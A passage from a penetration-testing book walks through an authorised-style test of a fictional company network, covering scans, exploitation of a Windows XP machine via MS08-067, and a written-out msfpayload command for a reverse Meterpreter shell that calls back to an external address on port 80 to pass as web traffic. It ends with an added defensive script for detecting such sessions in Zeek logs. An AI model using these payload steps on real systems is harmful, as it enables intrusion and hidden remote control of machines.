Hacking_and_Penetration_Testing_with_Low_Power_Devices
Penetration testing with multiple drones 199
be connected to this drone and used to collect all wireless traffic on the PFunEd network for the remainder of the penetration test.

Either the conference room or the receptionist drone can be used to scan the network for interesting targets. The drone in the conference room might be preferable on the off chance that the receptionist's computer is shut down every evening. The nmap-scan.py script from the previous chapter might be handy for this. Recall that in addition to displaying results on the screen, the scan data are stored in a JSON file for use in later scripts.
The nmap scan reveals two targets of interest. One target is a Windows XP machine at address 192.168.2.185 in the sales department that is potentially vulnerable. The other interesting target is a development server at address 192.168.2.158 with a plethora of services including git, SSH, FTP, and several databases. OpenVAS will be run against both of these targets to detect any quick wins. The scan also revealed that the rogue access point is a NETGEAR router attached to the PFunEd network at address 192.168.2.186. The drone has been assigned an address of 192.168.2.197.
Before the OpenVAS scan can be conducted, the OpenVAS server must be started. When not in use, this server should be disabled because it consumes a lot of resources and will greatly increase boot time if automatically started on boot. Recall that the server will attempt to update itself if it is run from a machine with Internet access.
Running the openvas-scan.py script from the previous chapter (which will iterate over live hosts from the nmap scan) reveals no well-known vulnerabilities on the Linux development server and verifies that the salesman's Windows XP machine is exploitable via the MS08-067 vulnerability. As before, the msfcli utility can be used to exploit the machine and drop a payload, extract files and password hashes, open a shell, etc.
In this case, a reverse TCP Meterpreter shell will be used as a payload. A reverse payload causes a compromised machine to connect to another machine instead of listening on a port. This is done to limit the likelihood of things being blocked by firewalls. To make the most out of the situation, a connection will be made to port 80 on a Linux server back at the office with a static IP address. The Linux machine will be running a handler on port 80. Traffic from the exploited machine will appear as normal Web traffic to any administrators at PFE. An intern from a local university will operate the machine at the office.
The multihandler must be started at the machine back at the office. The machine has a public Internet address of 97.64.185.147. The series of commands required to start the multihandler on this machine are shown in Figure 7.20.
A payload to connect back to the intern's machine can be created with the msfpayload utility. The correct command is msfpayload windows/meterpreter/reverse_tcp LHOST=97.64.185.147 LPORT=80 X > /tmp/notepad.exe. This will be uploaded and executed using the Metasploit payload upexec. If needed, this payload can be set to autostart or a backdoor can be installed by the intern using the Meterpreter shell.
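As an added example that is not from the book, here is the defender's view of the port 80 trick described above: a protocol-aware sensor such as Zeek labels each connection by the protocol it actually carried, so a raw Meterpreter TCP session on port 80 shows up as a non-HTTP flow to an external address, unlike genuine browsing. The script scans constructed Zeek-style conn.log JSON records for that pattern; the addresses reuse the ones quoted in the text, and the log lines themselves are made up.

```python
import ipaddress
import json
from typing import Dict, Iterable, List

# Constructed Zeek-style conn.log records in JSON form (not taken from the book).
# 192.168.2.185 is the host the text describes as exploited; 97.64.185.147:80 is
# the handler address it quotes. The other records are ordinary background traffic.
SAMPLE_CONN_LOG = """\
{"ts":1700000000.1,"id.orig_h":"192.168.2.185","id.resp_h":"97.64.185.147","id.resp_p":80,"proto":"tcp","duration":5400.2,"orig_bytes":40112,"resp_bytes":910233}
{"ts":1700000010.5,"id.orig_h":"192.168.2.50","id.resp_h":"93.184.216.34","id.resp_p":80,"proto":"tcp","service":"http","duration":0.8,"orig_bytes":512,"resp_bytes":12000}
{"ts":1700000020.0,"id.orig_h":"192.168.2.158","id.resp_h":"192.168.2.186","id.resp_p":80,"proto":"tcp","service":"-","duration":1.2,"orig_bytes":300,"resp_bytes":2000}
{"ts":1700000030.0,"id.orig_h":"192.168.2.185","id.resp_h":"97.64.185.147","id.resp_p":80,"proto":"tcp","duration":0.05,"orig_bytes":0,"resp_bytes":0}
"""


def _is_external(host: str) -> bool:
    """True for addresses outside RFC 1918, loopback, link-local and similar ranges."""
    try:
        return not ipaddress.ip_address(host).is_private
    except ValueError:
        return False


def find_non_http_on_port80(lines: Iterable[str], long_session_s: float = 300.0) -> List[Dict]:
    """Flag TCP/80 flows to external hosts that Zeek's protocol detection did not
    identify as HTTP and that actually carried data. Returns one alert per flow."""
    alerts = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        rec = json.loads(raw)
        if rec.get("proto") != "tcp" or rec.get("id.resp_p") != 80:
            continue
        # Zeek writes "-" (TSV) or omits the field (JSON) when no analyser claimed the flow.
        service = rec.get("service", "-")
        if service == "http" or not _is_external(rec["id.resp_h"]):
            continue
        payload = int(rec.get("orig_bytes", 0)) + int(rec.get("resp_bytes", 0))
        if payload == 0:
            continue  # connection attempt with no data: a failed callback, not a live session
        reasons = ["non-HTTP on TCP/80 to external host"]
        if float(rec.get("duration", 0)) >= long_session_s:
            reasons.append("long-lived session")
        alerts.append({"ts": rec["ts"], "orig_h": rec["id.orig_h"],
                       "resp_h": rec["id.resp_h"], "bytes": payload, "reasons": reasons})
    return alerts
```

The same rule written as a Zeek notice or SIEM query gives the PFE administrators the signal the text says they would lack; an egress proxy that only forwards real HTTP would block the session outright.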